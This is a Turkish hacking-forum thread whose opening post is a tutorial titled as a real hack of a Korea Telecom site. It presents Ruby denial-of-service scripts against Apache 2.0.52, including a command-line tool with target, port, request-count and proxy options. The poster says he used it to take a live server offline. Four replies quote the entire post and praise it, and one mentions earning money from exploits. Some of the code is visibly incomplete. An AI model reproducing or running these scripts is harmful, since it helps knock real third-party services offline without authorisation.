Exploit Eğitimi #3 (Gerçek Site Hack)(Korea Telecom)

Bunjo

Anka Underground Team
14 Ara 2020
532
425
Ruby
Ben BUNJO, bugün "Apache 2.0.52" sürümüne yazmış olduğumuz bir "DoS" saldırıs yapan exploit ile bir siteyi hackleyeceğiz.
Bu konuda vermiş olduğum aracı kullanıyorum ve keşif aşamasına geçiyorum. --> "GET Request" ile "Header" ve "Response" Bilgisi Çekmek

Hedef websitenin "Apache 2.0.52" sürümünü kullandığını görüyorum. (Exploiti uyguladığım site şu anda istek işleyebilecek bir durumda olmadığı için "Apache 2.0.53" kullanan alternatif bir site üzerinden gösteriyorum.)Sürümü internette arattığım zaman pek fazla kaynak bulamıyorum fakat aşağılara doğru indiğimde https://www.giac.org/paper/gcih/666/apache-2052-denial-service-analysis/106768 bu dosyayla karşılaşıyorum ve bu kısımda bir "DoS" açığı olduğunu ve sunucuyu spamlamam gerektiğini anlıyorum.Kütüphaneleri aktardım.

Ruby:
require 'socket'
require 'net/http'

Kullanıcıdan argümanları aldım.

Ruby:
if ARGV.length < 1
 puts "Usage: #{$PROGRAM_NAME} <host_ip> <request_number> <connect_timeout>"
 exit(0)
end

Sunucuya bağlantı açtım.

Ruby:
begin
 socket = TCPSocket.new(ARGV[0], 80, connect_timeout: 6)
rescue StandardError => standart_error
 puts "Error: #{standart_error.message}"
 exit
end

Kullanıcı girdisi kadar sunucuya boş string spamladım.

Ruby:
begin
 socket.puts "GET / HTTP/1.0"
 trys = ARGV[1].to_i if ARGV[1] || 8000
 puts "Connected to #{ARGV[0]}"

 (1..trys).each do
  socket.puts(" " * )
 end

rescue Errno::EPIPE => e

En sonunda bağlantıyı kapattım.

Ruby:
ensure
 socket.close if socket && !socket.closed?
 puts "dosed.."
end

Dikkatiniz üzerine kodda bir proxy ya da user-agent desteği yoktur. Bu yüzden korumalı sitelerde işe yaramayabilir bunun için exploiti geliştiriyorum: GitHub - thebunjo/apache2.0.52-exploit buradan gelişmeleri takip edebilirsiniz ve exploitin üst düzey haline göz atabilirsiniz. Konuya devam edelim fazla dağıtmadan.şekilde görüldüğü üzere exploiti kullanıyorum ve hedef apache sunucusunu istek işleyemeyecek hale getiriyorum.

Girmeye çalışalım:Proxy ile de deneyelim:Bu arada site hakkında bilgi almak isterseniz:

(KOREA TELECOM)Bu konu biraz kısa ve kolay oldu bende farkettim exploitin üst düzey halini threading, proxy ve user-agent eklenmemiş halini paylaşayım:


Ruby:
require 'socket'
require 'net/http'
require 'optparse'

def print_banner
 banner_text = <<-'BANNER'
  _          _
 _( )         ( )_
(_, |   __ __   | ,_)
  \'\  / ^ \  /'/
  '\'\,/\   \,/'/'
   '\| []  [] |/'
    (_ /^\ _)  Apache 2.0.52 "GET" Denial Of Service Exploit
     \ ~ /   By BUNJO. Github: https://github.com/thebunjo
     /HHHHH\   ------------- "Anka Red Team" -------------
    /'/{^^^}\'\
  _,/'/' ^^^ '\'\,_
  (_, |      | ,_)
   (_)      (_)
 BANNER

 puts banner_text
end

Ruby:
print_banner

$options = {
 target_url: nil,
 timeout: 3,
 request_number: 1881,
 port: 80,
 proxy_file: "./proxy_bunjo.txt",
 use_ssl: false,
}

def print_usage_message
 puts <<~USAGE
  Usage: #{$PROGRAM_NAME} [options]

  Options:
   -d, --domain TARGET_DOMAIN Target DOMAIN.
   -p, --port ATTACK_PORT    Port to attack (default: #{$options[:port]}).
   -r, --request REQUEST_NUMBER Request number (default: #{$options[:request_number]}).
   -s, --timeout TIMEOUT    Timeout in seconds (default: #{$options[:timeout]}).
   -l, --proxylist PROXY_FILE_PATH Proxy to use (default: #{$options[:proxy_file]}).

   -h, --help Show this message.
 USAGE
end

Ruby:
OptionParser.new do |opts|
 opts.on("-d", "--domain TARGET_DOMAIN", "Target Domain.") do |target_url|
  $options[:target_url] = target_url.to_s
 end
 opts.on("--use-ssl", "Use SSL") do |use_ssl|
  $options[:use_ssl] = true
 end
 opts.on("-p", "--port ATTACK_PORT", "Port to attack (default: #{$options[:port]}).") do |port|
  $options[:port] = port.to_i
 end
 opts.on("-r", "--request REQUEST_NUMBER", "Request number (default: #{$options[:request_number]}).") do |request_number|
  $options[:request_number] = request_number.to_i
 end
 opts.on("-s", "--timeout TIMEOUT", "Timeout in seconds (default: #{$options[:timeout]}).") do |timeout|
  $options[:timeout] = timeout.to_i
 end
 opts.on("-l", "--proxylist", "Proxy list path. (default: #{$options[:proxy_file]}).") do |proxyfile|
  $options[:proxy_file] = proxyfile
 end
 opts.on("-h", "--help", "Print this help message.") do
  print_usage_message
  exit(0)
 end
end.parse!

Ruby:
def send_request(host, request_number)
 begin
 rescue Errno::EPIPE, Errno::ECONNRESET => e
  puts "Error: #{e.message}"
 rescue Errno::EHOSTUNREACH, Errno::ENETUNREACH => e
  puts "Host or Network Unreachable Error: #{e.message}"
 rescue SocketError, IOError, Exception, StandardError => e
  puts "#{e.class} Error: #{e.message}"
 end
end

def connect_to_target(target, port, request_number, timeout)
 puts "Attack started."
 puts "\tConnected: #{target}"
 puts "\tPort: #{$options[:port]}"

 begin
  $options[:request_number].times do
   $socket_to_connect = TCPSocket.new(target, port, connect_timeout: timeout)
   $socket_to_connect.puts(" ")
   $socket_to_connect.puts "GET / HTTP/1.0"
   $socket_to_connect.close
  end
  puts "Sent: #{request_number}"
  puts "Attack Finished."
 rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNREFUSED => e
  puts "#{e.class} Error: #{e.message}"
  exit(1)
 rescue StandardError => e
  puts "Error: #{e.message}"
  exit(1)
 end
end

Ruby:
if $options[:target_url]
 connect_to_target($options[:target_url], $options[:port], $options[:request_number], $options[:timeout])
else
 print_usage_message
end

exploit daha bitmemiştir gelişme aşamasındadır yardımcı olmak isteyenlere karşı yardıma açığım.
Bu kadardı teşekkür ederim.

Not: exploit eğitimlerine fazla istek gelmemesi üzere bir süre ara veriyorum.
 
Son düzenleme:

Çokgen

Üye
4 Eyl 2023
221
60
Ben BUNJO, bugün "Apache 2.0.52" sürümüne yazmış olduğumuz bir "DoS" saldırıs yapan exploit ile bir siteyi hackleyeceğiz.
Bu konuda vermiş olduğum aracı kullanıyorum ve keşif aşamasına geçiyorum. --> "GET Request" ile "Header" ve "Response" Bilgisi Çekmek

Hedef websitenin "Apache 2.0.52" sürümünü kullandığını görüyorum. (Exploiti uyguladığım site şu anda istek işleyebilecek bir durumda olmadığı için "Apache 2.0.53" kullanan alternatif bir site üzerinden gösteriyorum.)Sürümü internette arattığım zaman pek fazla kaynak bulamıyorum fakat aşağılara doğru indiğimde https://www.giac.org/paper/gcih/666/apache-2052-denial-service-analysis/106768 bu dosyayla karşılaşıyorum ve bu kısımda bir "DoS" açığı olduğunu ve sunucuyu spamlamam gerektiğini anlıyorum.Kütüphaneleri aktardım.

Ruby:
require 'socket'
require 'net/http'

Kullanıcıdan argümanları aldım.

Ruby:
if ARGV.length < 1
 puts "Usage: #{$PROGRAM_NAME} <host_ip> <request_number> <connect_timeout>"
 exit(0)
end

Sunucuya bağlantı açtım.

Ruby:
begin
 socket = TCPSocket.new(ARGV[0], 80, connect_timeout: 6)
rescue StandardError => standart_error
 puts "Error: #{standart_error.message}"
 exit
end

Kullanıcı girdisi kadar sunucuya boş string spamladım.

Ruby:
begin
 socket.puts "GET / HTTP/1.0"
 trys = ARGV[1].to_i if ARGV[1] || 8000
 puts "Connected to #{ARGV[0]}"

 (1..trys).each do
  socket.puts(" " * )
 end

rescue Errno::EPIPE => e

En sonunda bağlantıyı kapattım.

Ruby:
ensure
 socket.close if socket && !socket.closed?
 puts "dosed.."
end

Dikkatiniz üzerine kodda bir proxy ya da user-agent desteği yoktur. Bu yüzden korumalı sitelerde işe yaramayabilir bunun için exploiti geliştiriyorum: GitHub - thebunjo/apache2.0.52-exploit buradan gelişmeleri takip edebilirsiniz ve exploitin üst düzey haline göz atabilirsiniz. Konuya devam edelim fazla dağıtmadan.şekilde görüldüğü üzere exploiti kullanıyorum ve hedef apache sunucusunu istek işleyemeyecek hale getiriyorum.

Girmeye çalışalım:Proxy ile de deneyelim:Bu arada site hakkında bilgi almak isterseniz:

(KOREA TELECOM)Bu konu biraz kısa ve kolay oldu bende farkettim exploitin üst düzey halini threading, proxy ve user-agent eklenmemiş halini paylaşayım:


Ruby:
require 'socket'
require 'net/http'
require 'optparse'

def print_banner
 banner_text = <<-'BANNER'
  _          _
 _( )         ( )_
(_, |   __ __   | ,_)
  \'\  / ^ \  /'/
  '\'\,/\   \,/'/'
   '\| []  [] |/'
    (_ /^\ _)  Apache 2.0.52 "GET" Denial Of Service Exploit
     \ ~ /   By BUNJO. Github: https://github.com/thebunjo
     /HHHHH\   ------------- "Anka Red Team" -------------
    /'/{^^^}\'\
  _,/'/' ^^^ '\'\,_
  (_, |      | ,_)
   (_)      (_)
 BANNER

 puts banner_text
end

Ruby:
print_banner

$options = {
 target_url: nil,
 timeout: 3,
 request_number: 1881,
 port: 80,
 proxy_file: "./proxy_bunjo.txt",
 use_ssl: false,
}

def print_usage_message
 puts <<~USAGE
  Usage: #{$PROGRAM_NAME} [options]

  Options:
   -d, --domain TARGET_DOMAIN Target DOMAIN.
   -p, --port ATTACK_PORT    Port to attack (default: #{$options[:port]}).
   -r, --request REQUEST_NUMBER Request number (default: #{$options[:request_number]}).
   -s, --timeout TIMEOUT    Timeout in seconds (default: #{$options[:timeout]}).
   -l, --proxylist PROXY_FILE_PATH Proxy to use (default: #{$options[:proxy_file]}).

   -h, --help Show this message.
 USAGE
end

Ruby:
OptionParser.new do |opts|
 opts.on("-d", "--domain TARGET_DOMAIN", "Target Domain.") do |target_url|
  $options[:target_url] = target_url.to_s
 end
 opts.on("--use-ssl", "Use SSL") do |use_ssl|
  $options[:use_ssl] = true
 end
 opts.on("-p", "--port ATTACK_PORT", "Port to attack (default: #{$options[:port]}).") do |port|
  $options[:port] = port.to_i
 end
 opts.on("-r", "--request REQUEST_NUMBER", "Request number (default: #{$options[:request_number]}).") do |request_number|
  $options[:request_number] = request_number.to_i
 end
 opts.on("-s", "--timeout TIMEOUT", "Timeout in seconds (default: #{$options[:timeout]}).") do |timeout|
  $options[:timeout] = timeout.to_i
 end
 opts.on("-l", "--proxylist", "Proxy list path. (default: #{$options[:proxy_file]}).") do |proxyfile|
  $options[:proxy_file] = proxyfile
 end
 opts.on("-h", "--help", "Print this help message.") do
  print_usage_message
  exit(0)
 end
end.parse!

Ruby:
def send_request(host, request_number)
 begin
 rescue Errno::EPIPE, Errno::ECONNRESET => e
  puts "Error: #{e.message}"
 rescue Errno::EHOSTUNREACH, Errno::ENETUNREACH => e
  puts "Host or Network Unreachable Error: #{e.message}"
 rescue SocketError, IOError, Exception, StandardError => e
  puts "#{e.class} Error: #{e.message}"
 end
end

def connect_to_target(target, port, request_number, timeout)
 puts "Attack started."
 puts "\tConnected: #{target}"
 puts "\tPort: #{$options[:port]}"

 begin
  $options[:request_number].times do
   $socket_to_connect = TCPSocket.new(target, port, connect_timeout: timeout)
   $socket_to_connect.puts(" ")
   $socket_to_connect.puts "GET / HTTP/1.0"
   $socket_to_connect.close
  end
  puts "Sent: #{request_number}"
  puts "Attack Finished."
 rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNREFUSED => e
  puts "#{e.class} Error: #{e.message}"
  exit(1)
 rescue StandardError => e
  puts "Error: #{e.message}"
  exit(1)
 end
end

Ruby:
if $options[:target_url]
 connect_to_target($options[:target_url], $options[:port], $options[:request_number], $options[:timeout])
else
 print_usage_message
end

exploit daha bitmemiştir gelişme aşamasındadır yardımcı olmak isteyenlere karşı yardıma açığım.
Bu kadardı teşekkür ederim.

Not: exploit eğitimlerine fazla istek gelmemesi üzere bir süre ara veriyorum.
Ellerinize sağlık hocam.
 

drjacob

Uzman üye
21 Ocak 2012
1,153
200
localhost
Ben BUNJO, bugün "Apache 2.0.52" sürümüne yazmış olduğumuz bir "DoS" saldırıs yapan exploit ile bir siteyi hackleyeceğiz.
Bu konuda vermiş olduğum aracı kullanıyorum ve keşif aşamasına geçiyorum. --> "GET Request" ile "Header" ve "Response" Bilgisi Çekmek

Hedef websitenin "Apache 2.0.52" sürümünü kullandığını görüyorum. (Exploiti uyguladığım site şu anda istek işleyebilecek bir durumda olmadığı için "Apache 2.0.53" kullanan alternatif bir site üzerinden gösteriyorum.)Sürümü internette arattığım zaman pek fazla kaynak bulamıyorum fakat aşağılara doğru indiğimde https://www.giac.org/paper/gcih/666/apache-2052-denial-service-analysis/106768 bu dosyayla karşılaşıyorum ve bu kısımda bir "DoS" açığı olduğunu ve sunucuyu spamlamam gerektiğini anlıyorum.Kütüphaneleri aktardım.

Ruby:
require 'socket'
require 'net/http'

Kullanıcıdan argümanları aldım.

Ruby:
if ARGV.length < 1
 puts "Usage: #{$PROGRAM_NAME} <host_ip> <request_number> <connect_timeout>"
 exit(0)
end

Sunucuya bağlantı açtım.

Ruby:
begin
 socket = TCPSocket.new(ARGV[0], 80, connect_timeout: 6)
rescue StandardError => standart_error
 puts "Error: #{standart_error.message}"
 exit
end

Kullanıcı girdisi kadar sunucuya boş string spamladım.

Ruby:
begin
 socket.puts "GET / HTTP/1.0"
 trys = ARGV[1].to_i if ARGV[1] || 8000
 puts "Connected to #{ARGV[0]}"

 (1..trys).each do
  socket.puts(" " * )
 end

rescue Errno::EPIPE => e

En sonunda bağlantıyı kapattım.

Ruby:
ensure
 socket.close if socket && !socket.closed?
 puts "dosed.."
end

Dikkatiniz üzerine kodda bir proxy ya da user-agent desteği yoktur. Bu yüzden korumalı sitelerde işe yaramayabilir bunun için exploiti geliştiriyorum: GitHub - thebunjo/apache2.0.52-exploit buradan gelişmeleri takip edebilirsiniz ve exploitin üst düzey haline göz atabilirsiniz. Konuya devam edelim fazla dağıtmadan.şekilde görüldüğü üzere exploiti kullanıyorum ve hedef apache sunucusunu istek işleyemeyecek hale getiriyorum.

Girmeye çalışalım:Proxy ile de deneyelim:Bu arada site hakkında bilgi almak isterseniz:

(KOREA TELECOM)Bu konu biraz kısa ve kolay oldu bende farkettim exploitin üst düzey halini threading, proxy ve user-agent eklenmemiş halini paylaşayım:


Ruby:
require 'socket'
require 'net/http'
require 'optparse'

def print_banner
 banner_text = <<-'BANNER'
  _          _
 _( )         ( )_
(_, |   __ __   | ,_)
  \'\  / ^ \  /'/
  '\'\,/\   \,/'/'
   '\| []  [] |/'
    (_ /^\ _)  Apache 2.0.52 "GET" Denial Of Service Exploit
     \ ~ /   By BUNJO. Github: https://github.com/thebunjo
     /HHHHH\   ------------- "Anka Red Team" -------------
    /'/{^^^}\'\
  _,/'/' ^^^ '\'\,_
  (_, |      | ,_)
   (_)      (_)
 BANNER

 puts banner_text
end

Ruby:
print_banner

$options = {
 target_url: nil,
 timeout: 3,
 request_number: 1881,
 port: 80,
 proxy_file: "./proxy_bunjo.txt",
 use_ssl: false,
}

def print_usage_message
 puts <<~USAGE
  Usage: #{$PROGRAM_NAME} [options]

  Options:
   -d, --domain TARGET_DOMAIN Target DOMAIN.
   -p, --port ATTACK_PORT    Port to attack (default: #{$options[:port]}).
   -r, --request REQUEST_NUMBER Request number (default: #{$options[:request_number]}).
   -s, --timeout TIMEOUT    Timeout in seconds (default: #{$options[:timeout]}).
   -l, --proxylist PROXY_FILE_PATH Proxy to use (default: #{$options[:proxy_file]}).

   -h, --help Show this message.
 USAGE
end

Ruby:
OptionParser.new do |opts|
 opts.on("-d", "--domain TARGET_DOMAIN", "Target Domain.") do |target_url|
  $options[:target_url] = target_url.to_s
 end
 opts.on("--use-ssl", "Use SSL") do |use_ssl|
  $options[:use_ssl] = true
 end
 opts.on("-p", "--port ATTACK_PORT", "Port to attack (default: #{$options[:port]}).") do |port|
  $options[:port] = port.to_i
 end
 opts.on("-r", "--request REQUEST_NUMBER", "Request number (default: #{$options[:request_number]}).") do |request_number|
  $options[:request_number] = request_number.to_i
 end
 opts.on("-s", "--timeout TIMEOUT", "Timeout in seconds (default: #{$options[:timeout]}).") do |timeout|
  $options[:timeout] = timeout.to_i
 end
 opts.on("-l", "--proxylist", "Proxy list path. (default: #{$options[:proxy_file]}).") do |proxyfile|
  $options[:proxy_file] = proxyfile
 end
 opts.on("-h", "--help", "Print this help message.") do
  print_usage_message
  exit(0)
 end
end.parse!

Ruby:
def send_request(host, request_number)
 begin
 rescue Errno::EPIPE, Errno::ECONNRESET => e
  puts "Error: #{e.message}"
 rescue Errno::EHOSTUNREACH, Errno::ENETUNREACH => e
  puts "Host or Network Unreachable Error: #{e.message}"
 rescue SocketError, IOError, Exception, StandardError => e
  puts "#{e.class} Error: #{e.message}"
 end
end

def connect_to_target(target, port, request_number, timeout)
 puts "Attack started."
 puts "\tConnected: #{target}"
 puts "\tPort: #{$options[:port]}"

 begin
  $options[:request_number].times do
   $socket_to_connect = TCPSocket.new(target, port, connect_timeout: timeout)
   $socket_to_connect.puts(" ")
   $socket_to_connect.puts "GET / HTTP/1.0"
   $socket_to_connect.close
  end
  puts "Sent: #{request_number}"
  puts "Attack Finished."
 rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNREFUSED => e
  puts "#{e.class} Error: #{e.message}"
  exit(1)
 rescue StandardError => e
  puts "Error: #{e.message}"
  exit(1)
 end
end

Ruby:
if $options[:target_url]
 connect_to_target($options[:target_url], $options[:port], $options[:request_number], $options[:timeout])
else
 print_usage_message
end

exploit daha bitmemiştir gelişme aşamasındadır yardımcı olmak isteyenlere karşı yardıma açığım.
Bu kadardı teşekkür ederim.

Not: exploit eğitimlerine fazla istek gelmemesi üzere bir süre ara veriyorum.
emeğine sağlık hocam.
 

Yagami Light0

Katılımcı Üye
5 May 2023
651
269
Ben BUNJO, bugün "Apache 2.0.52" sürümüne yazmış olduğumuz bir "DoS" saldırıs yapan exploit ile bir siteyi hackleyeceğiz.
Bu konuda vermiş olduğum aracı kullanıyorum ve keşif aşamasına geçiyorum. --> "GET Request" ile "Header" ve "Response" Bilgisi Çekmek

Hedef websitenin "Apache 2.0.52" sürümünü kullandığını görüyorum. (Exploiti uyguladığım site şu anda istek işleyebilecek bir durumda olmadığı için "Apache 2.0.53" kullanan alternatif bir site üzerinden gösteriyorum.)Sürümü internette arattığım zaman pek fazla kaynak bulamıyorum fakat aşağılara doğru indiğimde https://www.giac.org/paper/gcih/666/apache-2052-denial-service-analysis/106768 bu dosyayla karşılaşıyorum ve bu kısımda bir "DoS" açığı olduğunu ve sunucuyu spamlamam gerektiğini anlıyorum.Kütüphaneleri aktardım.

Ruby:
require 'socket'
require 'net/http'

Kullanıcıdan argümanları aldım.

Ruby:
if ARGV.length < 1
 puts "Usage: #{$PROGRAM_NAME} <host_ip> <request_number> <connect_timeout>"
 exit(0)
end

Sunucuya bağlantı açtım.

Ruby:
begin
 socket = TCPSocket.new(ARGV[0], 80, connect_timeout: 6)
rescue StandardError => standart_error
 puts "Error: #{standart_error.message}"
 exit
end

Kullanıcı girdisi kadar sunucuya boş string spamladım.

Ruby:
begin
 socket.puts "GET / HTTP/1.0"
 trys = ARGV[1].to_i if ARGV[1] || 8000
 puts "Connected to #{ARGV[0]}"

 (1..trys).each do
  socket.puts(" " * )
 end

rescue Errno::EPIPE => e

En sonunda bağlantıyı kapattım.

Ruby:
ensure
 socket.close if socket && !socket.closed?
 puts "dosed.."
end

Dikkatiniz üzerine kodda bir proxy ya da user-agent desteği yoktur. Bu yüzden korumalı sitelerde işe yaramayabilir bunun için exploiti geliştiriyorum: GitHub - thebunjo/apache2.0.52-exploit buradan gelişmeleri takip edebilirsiniz ve exploitin üst düzey haline göz atabilirsiniz. Konuya devam edelim fazla dağıtmadan.şekilde görüldüğü üzere exploiti kullanıyorum ve hedef apache sunucusunu istek işleyemeyecek hale getiriyorum.

Girmeye çalışalım:Proxy ile de deneyelim:Bu arada site hakkında bilgi almak isterseniz:

(KOREA TELECOM)Bu konu biraz kısa ve kolay oldu bende farkettim exploitin üst düzey halini threading, proxy ve user-agent eklenmemiş halini paylaşayım:


Ruby:
require 'socket'
require 'net/http'
require 'optparse'

def print_banner
 banner_text = <<-'BANNER'
  _          _
 _( )         ( )_
(_, |   __ __   | ,_)
  \'\  / ^ \  /'/
  '\'\,/\   \,/'/'
   '\| []  [] |/'
    (_ /^\ _)  Apache 2.0.52 "GET" Denial Of Service Exploit
     \ ~ /   By BUNJO. Github: https://github.com/thebunjo
     /HHHHH\   ------------- "Anka Red Team" -------------
    /'/{^^^}\'\
  _,/'/' ^^^ '\'\,_
  (_, |      | ,_)
   (_)      (_)
 BANNER

 puts banner_text
end

Ruby:
print_banner

$options = {
 target_url: nil,
 timeout: 3,
 request_number: 1881,
 port: 80,
 proxy_file: "./proxy_bunjo.txt",
 use_ssl: false,
}

def print_usage_message
 puts <<~USAGE
  Usage: #{$PROGRAM_NAME} [options]

  Options:
   -d, --domain TARGET_DOMAIN Target DOMAIN.
   -p, --port ATTACK_PORT    Port to attack (default: #{$options[:port]}).
   -r, --request REQUEST_NUMBER Request number (default: #{$options[:request_number]}).
   -s, --timeout TIMEOUT    Timeout in seconds (default: #{$options[:timeout]}).
   -l, --proxylist PROXY_FILE_PATH Proxy to use (default: #{$options[:proxy_file]}).

   -h, --help Show this message.
 USAGE
end

Ruby:
OptionParser.new do |opts|
 opts.on("-d", "--domain TARGET_DOMAIN", "Target Domain.") do |target_url|
  $options[:target_url] = target_url.to_s
 end
 opts.on("--use-ssl", "Use SSL") do |use_ssl|
  $options[:use_ssl] = true
 end
 opts.on("-p", "--port ATTACK_PORT", "Port to attack (default: #{$options[:port]}).") do |port|
  $options[:port] = port.to_i
 end
 opts.on("-r", "--request REQUEST_NUMBER", "Request number (default: #{$options[:request_number]}).") do |request_number|
  $options[:request_number] = request_number.to_i
 end
 opts.on("-s", "--timeout TIMEOUT", "Timeout in seconds (default: #{$options[:timeout]}).") do |timeout|
  $options[:timeout] = timeout.to_i
 end
 opts.on("-l", "--proxylist", "Proxy list path. (default: #{$options[:proxy_file]}).") do |proxyfile|
  $options[:proxy_file] = proxyfile
 end
 opts.on("-h", "--help", "Print this help message.") do
  print_usage_message
  exit(0)
 end
end.parse!

Ruby:
def send_request(host, request_number)
 begin
 rescue Errno::EPIPE, Errno::ECONNRESET => e
  puts "Error: #{e.message}"
 rescue Errno::EHOSTUNREACH, Errno::ENETUNREACH => e
  puts "Host or Network Unreachable Error: #{e.message}"
 rescue SocketError, IOError, Exception, StandardError => e
  puts "#{e.class} Error: #{e.message}"
 end
end

def connect_to_target(target, port, request_number, timeout)
 puts "Attack started."
 puts "\tConnected: #{target}"
 puts "\tPort: #{$options[:port]}"

 begin
  $options[:request_number].times do
   $socket_to_connect = TCPSocket.new(target, port, connect_timeout: timeout)
   $socket_to_connect.puts(" ")
   $socket_to_connect.puts "GET / HTTP/1.0"
   $socket_to_connect.close
  end
  puts "Sent: #{request_number}"
  puts "Attack Finished."
 rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNREFUSED => e
  puts "#{e.class} Error: #{e.message}"
  exit(1)
 rescue StandardError => e
  puts "Error: #{e.message}"
  exit(1)
 end
end

Ruby:
if $options[:target_url]
 connect_to_target($options[:target_url], $options[:port], $options[:request_number], $options[:timeout])
else
 print_usage_message
end

exploit daha bitmemiştir gelişme aşamasındadır yardımcı olmak isteyenlere karşı yardıma açığım.
Bu kadardı teşekkür ederim.

Not: exploit eğitimlerine fazla istek gelmemesi üzere bir süre ara veriyorum.
Kaliteli konu budur iste,eline saglik
 

Kudad

Katılımcı Üye
14 Nis 2021
622
134
Ben BUNJO, bugün "Apache 2.0.52" sürümüne yazmış olduğumuz bir "DoS" saldırıs yapan exploit ile bir siteyi hackleyeceğiz.
Bu konuda vermiş olduğum aracı kullanıyorum ve keşif aşamasına geçiyorum. --> "GET Request" ile "Header" ve "Response" Bilgisi Çekmek

Hedef websitenin "Apache 2.0.52" sürümünü kullandığını görüyorum. (Exploiti uyguladığım site şu anda istek işleyebilecek bir durumda olmadığı için "Apache 2.0.53" kullanan alternatif bir site üzerinden gösteriyorum.)Sürümü internette arattığım zaman pek fazla kaynak bulamıyorum fakat aşağılara doğru indiğimde https://www.giac.org/paper/gcih/666/apache-2052-denial-service-analysis/106768 bu dosyayla karşılaşıyorum ve bu kısımda bir "DoS" açığı olduğunu ve sunucuyu spamlamam gerektiğini anlıyorum.Kütüphaneleri aktardım.

Ruby:
require 'socket'
require 'net/http'

Kullanıcıdan argümanları aldım.

Ruby:
if ARGV.length < 1
 puts "Usage: #{$PROGRAM_NAME} <host_ip> <request_number> <connect_timeout>"
 exit(0)
end

Sunucuya bağlantı açtım.

Ruby:
begin
 socket = TCPSocket.new(ARGV[0], 80, connect_timeout: 6)
rescue StandardError => standart_error
 puts "Error: #{standart_error.message}"
 exit
end

Kullanıcı girdisi kadar sunucuya boş string spamladım.

Ruby:
begin
 socket.puts "GET / HTTP/1.0"
 trys = ARGV[1].to_i if ARGV[1] || 8000
 puts "Connected to #{ARGV[0]}"

 (1..trys).each do
  socket.puts(" " * )
 end

rescue Errno::EPIPE => e

En sonunda bağlantıyı kapattım.

Ruby:
ensure
 socket.close if socket && !socket.closed?
 puts "dosed.."
end

Dikkatiniz üzerine kodda bir proxy ya da user-agent desteği yoktur. Bu yüzden korumalı sitelerde işe yaramayabilir bunun için exploiti geliştiriyorum: GitHub - thebunjo/apache2.0.52-exploit buradan gelişmeleri takip edebilirsiniz ve exploitin üst düzey haline göz atabilirsiniz. Konuya devam edelim fazla dağıtmadan.şekilde görüldüğü üzere exploiti kullanıyorum ve hedef apache sunucusunu istek işleyemeyecek hale getiriyorum.

Girmeye çalışalım:Proxy ile de deneyelim:Bu arada site hakkında bilgi almak isterseniz:

(KOREA TELECOM)Bu konu biraz kısa ve kolay oldu bende farkettim exploitin üst düzey halini threading, proxy ve user-agent eklenmemiş halini paylaşayım:


Ruby:
require 'socket'
require 'net/http'
require 'optparse'

def print_banner
 banner_text = <<-'BANNER'
  _          _
 _( )         ( )_
(_, |   __ __   | ,_)
  \'\  / ^ \  /'/
  '\'\,/\   \,/'/'
   '\| []  [] |/'
    (_ /^\ _)  Apache 2.0.52 "GET" Denial Of Service Exploit
     \ ~ /   By BUNJO. Github: https://github.com/thebunjo
     /HHHHH\   ------------- "Anka Red Team" -------------
    /'/{^^^}\'\
  _,/'/' ^^^ '\'\,_
  (_, |      | ,_)
   (_)      (_)
 BANNER

 puts banner_text
end

Ruby:
print_banner

$options = {
 target_url: nil,
 timeout: 3,
 request_number: 1881,
 port: 80,
 proxy_file: "./proxy_bunjo.txt",
 use_ssl: false,
}

def print_usage_message
 puts <<~USAGE
  Usage: #{$PROGRAM_NAME} [options]

  Options:
   -d, --domain TARGET_DOMAIN Target DOMAIN.
   -p, --port ATTACK_PORT    Port to attack (default: #{$options[:port]}).
   -r, --request REQUEST_NUMBER Request number (default: #{$options[:request_number]}).
   -s, --timeout TIMEOUT    Timeout in seconds (default: #{$options[:timeout]}).
   -l, --proxylist PROXY_FILE_PATH Proxy to use (default: #{$options[:proxy_file]}).

   -h, --help Show this message.
 USAGE
end

Ruby:
OptionParser.new do |opts|
 opts.on("-d", "--domain TARGET_DOMAIN", "Target Domain.") do |target_url|
  $options[:target_url] = target_url.to_s
 end
 opts.on("--use-ssl", "Use SSL") do |use_ssl|
  $options[:use_ssl] = true
 end
 opts.on("-p", "--port ATTACK_PORT", "Port to attack (default: #{$options[:port]}).") do |port|
  $options[:port] = port.to_i
 end
 opts.on("-r", "--request REQUEST_NUMBER", "Request number (default: #{$options[:request_number]}).") do |request_number|
  $options[:request_number] = request_number.to_i
 end
 opts.on("-s", "--timeout TIMEOUT", "Timeout in seconds (default: #{$options[:timeout]}).") do |timeout|
  $options[:timeout] = timeout.to_i
 end
 opts.on("-l", "--proxylist", "Proxy list path. (default: #{$options[:proxy_file]}).") do |proxyfile|
  $options[:proxy_file] = proxyfile
 end
 opts.on("-h", "--help", "Print this help message.") do
  print_usage_message
  exit(0)
 end
end.parse!

Ruby:
def send_request(host, request_number)
 begin
 rescue Errno::EPIPE, Errno::ECONNRESET => e
  puts "Error: #{e.message}"
 rescue Errno::EHOSTUNREACH, Errno::ENETUNREACH => e
  puts "Host or Network Unreachable Error: #{e.message}"
 rescue SocketError, IOError, Exception, StandardError => e
  puts "#{e.class} Error: #{e.message}"
 end
end

def connect_to_target(target, port, request_number, timeout)
 puts "Attack started."
 puts "\tConnected: #{target}"
 puts "\tPort: #{$options[:port]}"

 begin
  $options[:request_number].times do
   $socket_to_connect = TCPSocket.new(target, port, connect_timeout: timeout)
   $socket_to_connect.puts(" ")
   $socket_to_connect.puts "GET / HTTP/1.0"
   $socket_to_connect.close
  end
  puts "Sent: #{request_number}"
  puts "Attack Finished."
 rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNREFUSED => e
  puts "#{e.class} Error: #{e.message}"
  exit(1)
 rescue StandardError => e
  puts "Error: #{e.message}"
  exit(1)
 end
end

Ruby:
if $options[:target_url]
 connect_to_target($options[:target_url], $options[:port], $options[:request_number], $options[:timeout])
else
 print_usage_message
end

exploit daha bitmemiştir gelişme aşamasındadır yardımcı olmak isteyenlere karşı yardıma açığım.
Bu kadardı teşekkür ederim.

Not: exploit eğitimlerine fazla istek gelmemesi üzere bir süre ara veriyorum.
ellerine sağlık.
exploit e devam et parayı vuruyorsun bir zaman sonra exploit yazarak.
 
Üst

